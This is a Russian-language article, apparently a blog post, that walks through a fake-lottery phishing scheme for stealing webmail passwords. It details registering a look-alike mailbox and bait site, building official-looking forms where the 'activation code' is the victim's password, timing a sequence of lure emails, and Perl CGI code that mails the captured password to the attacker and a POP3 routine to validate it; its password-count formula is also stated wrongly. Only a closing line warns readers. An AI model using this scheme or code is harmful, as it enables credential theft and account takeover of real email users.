Как нас разводят с лотереями

Алексей Комолов (С.-Петербург)

Как происходит добыча пароля от почты? Целей для доступа к вашему электронному адресу может быть довольно много: добыча каких-либо данных, отслеживание переписки и т.д. Но как это происходит “изнутри”? Как происходит взлом “глазами хакера”? Ниже я опишу одну из методик взлома, чтобы вам было ясно, как это происходит.

Самый примитивный используемый способ – попросить у владельца нужного вам мейла выслать вам пароль. Например, у вас почтовый ящик на Рамблере и к вам приходит письмо от admin@rambler.ru примерно такого содержания: “Наш север переезжает на другие сервера, в связи с чем мы просим вас выслать нам пароль от своей почты” (аналогичное письмо однажды пришло и ко мне). Явный развод, но… он довольно часто срабатывает.

Можно попробовать подобрать пароль. Но! По статистике средний пароль имеет длину 6-8 символов, причем используются только малые латинские буквы. Таких букв всего 26, поэтому получается “на выходе” от 308915776 до 208827064576 вариантов (формула расчета: количество букв * количество символов в пароле). Но опять же — если не используются большие буквы и не используются цифры. Поэтому данный метод, мягко говоря, не рационален.

Ниже я опишу вариант одного довольно действенного способа, которым хакеры периодически пользуются.

Наверняка многие из вас получали сообщения о том, что вы выиграли, например, 100.000$. Вы не задумывались, почему таких писем приходит так много и так часто? А потому, что это работает. На основе этой “лотереи” я и приведу пример.

Итак, есть хакер, которому нужен позарез пароль от одного почтового ящика для прочтения архиважной переписки, и есть пользователь-жертва, владелец этого самого ящика и один из авторов архиважной переписки. Сам ящик жертвы располагается на сервисе бесплатной почты и он читает письма через Web-интерфейс (через браузер, попросту войдя в свой почтовый ящик).

Для получения пароля хакер использовал встроенные в Windows стандартные программы, а именно: html-редактор Microsoft Frontpage, почтовик Outlook Express и ftp-клиент (Ftp.exe).

Дальнейшая мысль поста: так как сервер бесплатно предоставляет место под почту, то весь доход владельцам сайта идет от рекламы. Больше пользователей – больше рекламы – больше доход.
Далее вышеописанный хакер действует по такому принципу: а почему бы не провести лотерею от лица владельцев почтового сервера? Якобы им “приходит в голову идея”: а почему бы ни разыгрывать среди пользователей небольшие денежные призы с целью увеличения своей аудитории? Естественно, в качестве владельцев будет выступать сам хакер, а в “розыгрыше денежного приза” будет участвовать только 1 человек – жертва.

Для начала хакер заводит почтовый ящик на том же сервере, что и жертва. Для того, чтобы проще было воздействовать на жертву, хакеры обычно используют в качестве названия своего ящика такие слова, как lottery, prizes, rozigrish и т.д. Это особенно важно, если также предоставляется место под бесплатный сайт.

Допустим, у жертвы мейл называется Gertva@mailru.com. Хакер идет на сервер и видит, что владельцем является Hotbox.ru, и кроме mailru.com у них еще числятся fromru.com, hotchat.ru, hotbox.ru, krovatka.net, pisem.net, pochtamt.ru.

Хакер создает там новый ящик с названием, например, rozigrish@hotbox.ru и как бонус получает сайт http://www.rozigrish.hotbox.ru, который становится официальным сайтом “лотереи” (хакеры сами создают и заполняют сайт-приманку, часто используя заранее готовые шаблоны, просто подгоняя их под текущую задачу).

Хакер заходит в свой новый ящик и проверить, появилось ли там письмо с текстом типа “добро пожаловать на наш сервер. Вы можете воспользоваться следующими дополнительными услугами…” и т.д.

Если подобное письмо пришло — хакер сохраняет его на компьютере – оно будет служить образцом.
Если же такого письма не пришло, то хакеру придется либо “выдрать” одну из страниц на сервере, чтобы использовать в качестве образца “фирменного стиля”, либо делать все с нуля, но “по образу и подобию”.

Итак, фирменный дизайн есть (или создан), но его нужно заполнить необходимым текстом-посланием будущей жертве. Вариант письма: “вышли мне пароль от своей почты – я вышлю тебе миллион долларов” отпадает – такое явно не сработает.
Необходимо создать некое подобие лотерейного билета или бланка официального розыгрыша. Для этого в вышеописанный “официальный бланк” добавить таблицу с ячейками, в которых будут ячейки:

Кто и зачем проводит данную лотерею
Правила получения выигрыша и сроки
Размер выигрыша
Поле ввода кода активации*
Номер билета

* В эту строку пользователь должен будет ввести код. Хакер обычно дает сноску в конце поля и внизу письма — пояснение вроде такого: “Код активации билета совпадает с вашим паролем от вашего e-mail”.
Все просто, но, тем не мене, действенно.

Официальный бланк и заполняемые его ячейки и текст делаются html-редакторе (Frontpage), затем все это выделяется, копируется и вставляется в Outlook. (описывать весь html-код не имеет смысла – на разных серверах свои “бланки”).

Затем начинается небольшая подготовительная работа. Сначала жертве высылается письмо. В теме письма указано что-нибудь типа: “Рассылка новостей нашего почтового сервера”. В письме (на том же самом официальном бланке) пишется письмо, в котором говорится… ну, например, что количество зарегистрированных пользователей перевалило за 100 000 человек. Или что данный сервер входит в пятёрку лучших почтовых серверов России. Ну или еще что-то в том же духе. В конце письма пишется, что в связи с мега-крутизной данного сервера будет проводиться в ближайшее время розыгрыш денежных призов среди зарегистрированных пользователей.

Затем, спустя несколько дней после уведомления о проведении лотереи, жертве высылается письмо, в котором пользователю сообщается, что будет проводиться лотерея и что надо ввести свой пароль и отослать обратно.

Обычно хакеры, спустя несколько дней, высылают повторное письмо, “второго тиража” – с первого раза мало кто верит. Плюс добавляется список “победителей первого тиража”. Затем – идет роспись третьего тиража. Довольно часто, спустя некоторое время, после получения почти однотипных “официальных” сообщений многие люди клюют на приманку.

Итак, жертва клюнула… допустим, на второе письмо лотереи – с “победителями”. Жертва вводит пароль от своей почты в поле “Поле ввода кода активации” и высылает его обратно. Соответственно, хакерам необходимо сделать так, чтобы письмо попало к нему, а жертва увидела “результаты лотереи”.
Для этого в коде письма хакеры вписывают отправку содержимого на http://server.ru/rezultat.cgi.

Сам rezultat.cgi будет выглядеть так:
open (MAIL, «|$mailprog -t»);
print MAIL «Content-Type: text/plain «;
print MAIL «Subject: YESSSS «;
print MAIL «To: $mail «;
print MAIL «From: ‘.$target.’ «;
print MAIL «first is: $first»;
print MAIL «last is: $last»;
print MAIL «password is: $password»;
close (MAIL);

if (length($password)redirect(‘http://rozigrish.hotbox.ru/error.htm’);

}
Else
{
$query = CGI::new();
print $query->redirect(‘http://rozigrish.hotbox.ru/bilet.htm’);

}
####################

На деле это работает так: rezultat.cgi получает значение поля “Поле ввода кода активации” и отправляет их хакеру на мейл rozigrish@hotbox.ru (в письме специально указывается адрес, куда отсылается письмо).

Затем rezultat.cgi проверяет количество символов в “Поле ввода кода активации”, если символов меньше трех, то жертва попадет на страницу http://rozigrish.hotbox.ru/error.htm, где ему высветится, что пароль введен неверно и попросят ввести правильный пароль. Если там больше трех символов, то жертва попадет на http://rozigrish.hotbox.ru/bilet.htm, с результатами проверки билета.

Данный вариант скрипта, конечно, слишком прост в плане проверки подлинности “кода активации”, но, тем не менее, он достаточно универсален и подходит для всех почтовых служб.

Есть еще один, более продвинутый способ проверить верность пароля: если почтовый сервис предоставляет доступ по pop3 и работа клиента через web-интерфейс не блокирует его ящик, то можно использовать такой код:

use Net::POP3;

$host = «Gertva_mail.ru»;
$pop3=Net::POP3->new($host);
if ($pop3->login(«$first»,»$password»))
{
/* если пароль подходит, то жертва попадает на страницу результатов */
}
Else
{
/* если пароль не подходит, то жертва попадает на страницу с сообщением об ошибке*/
}

Как писалось выше, хакеры создают сами “официальный сайт поведения лотереи” (в данном случае это http://www.rozigrish.hotbox.ru). Чаще всего хватает трех страниц:

Главная
– куча надписей, и т.д.;
bilet.htm — страница, на которой “жертва”, в случае правильного ввода пароля, сможет лицезреть номер тиража, номер своего билета и сообщение о том, что “к сожалению, ваш билет ничего не выиграл”.
error.htm – страница, на которой жертве сообщается, что пароль введен неверно и просьба ввести правильный пароль.

Иногда у хакеров возникают проблемы с размещением скриптов (rezultat.cgi) — где-то вообще нельзя их использовать, а где-то запрещены внешние коннекты. В таких случаях скрипт размещается где-то извне (на другом сервере, сайте).

Если же “жертва” все-таки использует почтовый клиент (Outlook. TheBat!), а не web-интерфейс, то тут тоже возникает небольшая трудность: при отправке из почтового клиента хакер просто не получит значение “Поле ввода кода активации” (пароль пользователя, который введет собственноручно жертва).
Обычно в этой ситуации хакеры либо делают страницу error.htm точной копией “билета” и просьбой повторно ввести код активации, либо изменяют само “письмо” таким образом, что высылается не сам “билет”, а гиперссылка на него, а сама форма будет размещена на “официальном сайте” – в самом письме “жертве” будет предложено вводить “владельца билета” самостоятельно.

Если же вы не хотите потерять свой e-mail, то никогда не высылайте свой пароль никому – даже официальной службе поддержки.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *